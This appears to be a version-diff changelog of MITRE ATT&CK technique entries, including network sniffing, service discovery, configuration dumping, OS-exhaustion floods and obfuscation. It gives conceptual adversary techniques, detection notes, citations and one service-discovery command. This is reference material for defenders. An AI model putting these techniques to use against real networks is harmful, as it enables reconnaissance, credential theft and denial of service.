| Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 01:45:55.144000+00:00 | 2022-02-17 19:50:46.948000+00:00 |
| description | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. |
| x_mitre_detection | Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018) | Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018) |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well. | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
| external_references | CAPEC-300 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-09 14:56:26.562000+00:00 | 2022-04-20 16:05:30.960000+00:00 |
| name | Network Service Scanning | Network Service Discovery |
| description | Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well. | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) |
| external_references[1]['source_name'] | capec | apple doco bonjour description |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/300.html | https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html |
| x_mitre_version | 2.2 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'CISA AR21-126A FIVEHANDS May 2021', 'description': 'CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.', 'url': 'https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a'} | |
| external_references | {'source_name': 'macOS APT Activity Bradley', 'description': 'Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.', 'url': 'https://themittenmac.com/what-does-apt-activity-look-like-on-macos/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/300.html', 'external_id': 'CAPEC-300'} | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. | Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Oleg Kolesnikov, Securonix', 'Tiago Faria, 3CORESec'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
| external_references | CAPEC-158 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-02 17:51:59.236000+00:00 | 2022-05-20 17:32:27.146000+00:00 |
| description | Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. | Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring) |
| external_references[1]['source_name'] | capec | AWS Traffic Mirroring |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/158.html | https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. | Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GCP Packet Mirroring', 'description': 'Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.', 'url': 'https://cloud.google.com/vpc/docs/packet-mirroring'} | |
| external_references | {'source_name': 'SpecterOps AWS Traffic Mirroring', 'description': 'Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.', 'url': 'https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512'} | |
| external_references | {'source_name': 'Azure Virtual Network TAP', 'description': 'Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.', 'url': 'https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview'} | |
| external_references | {'source_name': 'Rhino Security Labs AWS VPC Traffic Mirroring', 'description': 'Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/158.html', 'external_id': 'CAPEC-158'} | |
| x_mitre_platforms | IaaS |
| Old Description | New Description |
|---|---|
| Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 19:41:49.412000+00:00 | 2022-02-17 15:38:54.578000+00:00 |
| description | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| Description |
|---|
| Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:55:01.922000+00:00 | 2022-03-08 21:00:53.436000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Process: Process Access | Windows Registry: Windows Registry Key Access |
| x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | File: File Access | Process: Process Access |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Access | Command: Command Execution |
| x_mitre_data_sources[5] | Active Directory: Active Directory Object Access | Process: OS API Execution |
| x_mitre_data_sources[6] | Network Traffic: Network Traffic Flow | Active Directory: Active Directory Object Access |
| x_mitre_data_sources[7] | Network Traffic: Network Traffic Content | Process: Process Creation |
| x_mitre_data_sources[8] | Process: OS API Execution | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) | Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019. | |
| external_references | CAPEC-469 | |
| external_references | CAPEC-482 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-469 | |
| external_references | CAPEC-482 | |
| external_references | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 15:54:35.429000+00:00 | 2022-04-19 23:12:31.329000+00:00 |
| description | Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) | Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) |
| external_references[1]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/469.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[2]['source_name'] | capec | Cloudflare SynFlood |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/482.html | https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/ |
| external_references[3]['source_name'] | Arbor AnnualDoSreport Jan 2018 | Corero SYN-ACKflood |
| external_references[3]['description'] | Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019. | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019. |
| external_references[3]['url'] | https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf | https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html |
| external_references[4]['source_name'] | Cloudflare SynFlood | Arbor AnnualDoSreport Jan 2018 |
| external_references[4]['description'] | Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019. | Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019. |
| external_references[4]['url'] | https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/ | https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf |
| external_references[5]['source_name'] | Corero SYN-ACKflood | capec |
| external_references[5]['url'] | https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html | https://capec.mitre.org/data/definitions/469.html |
| external_references[6]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[6]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/482.html |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Sensor Health: Host Status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Sensor Health: Host Status |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. | |
| external_references | CAPEC-267 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-267 | |
| external_references | Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20 16:33:13.472000+00:00 | 2022-09-30 18:06:32.808000+00:00 |
